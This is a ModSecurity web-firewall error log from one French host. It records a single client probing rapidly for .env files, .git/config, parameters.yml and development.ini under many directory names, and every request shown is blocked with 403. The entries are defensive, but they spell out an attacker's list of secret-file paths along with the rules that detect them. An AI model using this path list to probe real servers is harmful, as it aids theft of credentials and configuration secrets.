[Mon May 11 20:55:59.621871 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agImP9eaRXe5lR8y0ZOS9QAAAVU"]
[Mon May 11 20:55:59.622070 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agImP9eaRXe5lR8y0ZOS9QAAAVU"]
[Mon May 11 20:55:59.622295 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agImP9eaRXe5lR8y0ZOS9QAAAVU"]
[Mon May 11 20:55:59.666800 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agImP9eaRXe5lR8y0ZOS9gAAAVU"]
[Mon May 11 20:55:59.667039 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agImP9eaRXe5lR8y0ZOS9gAAAVU"]
[Mon May 11 20:55:59.667289 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agImP9eaRXe5lR8y0ZOS9gAAAVU"]
[Mon May 11 20:55:59.764418 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agImPyMeXtzav-mi9SyxsQAAAMw"]
[Mon May 11 20:55:59.764716 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agImPyMeXtzav-mi9SyxsQAAAMw"]
[Mon May 11 20:55:59.765012 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agImPyMeXtzav-mi9SyxsQAAAMw"]
[Mon May 11 20:55:59.825513 2026] [proxy_fcgi:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:55:59.865932 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api-backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api-backend/.env"] [unique_id "agImPyMeXtzav-mi9SyxswAAAMw"]
[Mon May 11 20:55:59.866205 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api-backend/.env"] [unique_id "agImPyMeXtzav-mi9SyxswAAAMw"]
[Mon May 11 20:55:59.866636 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api-backend/.env"] [unique_id "agImPyMeXtzav-mi9SyxswAAAMw"]
[Mon May 11 20:55:59.924034 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api-node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api-node/.env"] [unique_id "agImPzP5Q_-MBliRCAxnjAAAAAI"]
[Mon May 11 20:55:59.924281 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api-node/.env"] [unique_id "agImPzP5Q_-MBliRCAxnjAAAAAI"]
[Mon May 11 20:55:59.924505 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api-node/.env"] [unique_id "agImPzP5Q_-MBliRCAxnjAAAAAI"]
[Mon May 11 20:56:00.218845 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agImQDP5Q_-MBliRCAxnlAAAABg"]
[Mon May 11 20:56:00.219027 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agImQDP5Q_-MBliRCAxnlAAAABg"]
[Mon May 11 20:56:00.219219 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agImQDP5Q_-MBliRCAxnlAAAABg"]
[Mon May 11 20:56:00.227914 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /app/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/.git/config"] [unique_id "agImQPjVc-A-CSptvm1xlQAAAFE"]
[Mon May 11 20:56:00.228079 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/.git/config"] [unique_id "agImQPjVc-A-CSptvm1xlQAAAFE"]
[Mon May 11 20:56:00.228280 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/.git/config"] [unique_id "agImQPjVc-A-CSptvm1xlQAAAFE"]
[Mon May 11 20:56:00.302407 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/development.ini"] [unique_id "agImQJYn-x0CHsbEbP2t1gAAAIo"]
[Mon May 11 20:56:00.302686 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/development.ini"] [unique_id "agImQJYn-x0CHsbEbP2t1gAAAIo"]
[Mon May 11 20:56:00.302877 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/development.ini"] [unique_id "agImQJYn-x0CHsbEbP2t1gAAAIo"]
[Mon May 11 20:56:00.323150 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /app/config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/parameters.yml"] [unique_id "agImQCMeXtzav-mi9SyxuAAAAMw"]
[Mon May 11 20:56:00.323358 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/parameters.yml"] [unique_id "agImQCMeXtzav-mi9SyxuAAAAMw"]
[Mon May 11 20:56:00.323545 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/parameters.yml"] [unique_id "agImQCMeXtzav-mi9SyxuAAAAMw"]
[Mon May 11 20:56:00.399640 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /app/config/parameters.yml.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/parameters.yml.dist"] [unique_id "agImQDP5Q_-MBliRCAxnlQAAABY"]
[Mon May 11 20:56:00.399868 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/parameters.yml.dist"] [unique_id "agImQDP5Q_-MBliRCAxnlQAAABY"]
[Mon May 11 20:56:00.400095 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/parameters.yml.dist"] [unique_id "agImQDP5Q_-MBliRCAxnlQAAABY"]
[Mon May 11 20:56:00.426051 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env.production"] [unique_id "agImQCMeXtzav-mi9SyxuQAAAMo"]
[Mon May 11 20:56:00.426270 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env.production"] [unique_id "agImQCMeXtzav-mi9SyxuQAAAMo"]
[Mon May 11 20:56:00.426468 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env.production"] [unique_id "agImQCMeXtzav-mi9SyxuQAAAMo"]
[Mon May 11 20:56:00.526528 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/apis/.env"] [unique_id "agImQPjVc-A-CSptvm1xmwAAAFE"]
[Mon May 11 20:56:00.526693 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/apis/.env"] [unique_id "agImQPjVc-A-CSptvm1xmwAAAFE"]
[Mon May 11 20:56:00.526865 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/apis/.env"] [unique_id "agImQPjVc-A-CSptvm1xmwAAAFE"]
[Mon May 11 20:56:00.528024 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agImQCMeXtzav-mi9SyxugAAAMw"]
[Mon May 11 20:56:00.528197 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agImQCMeXtzav-mi9SyxugAAAMw"]
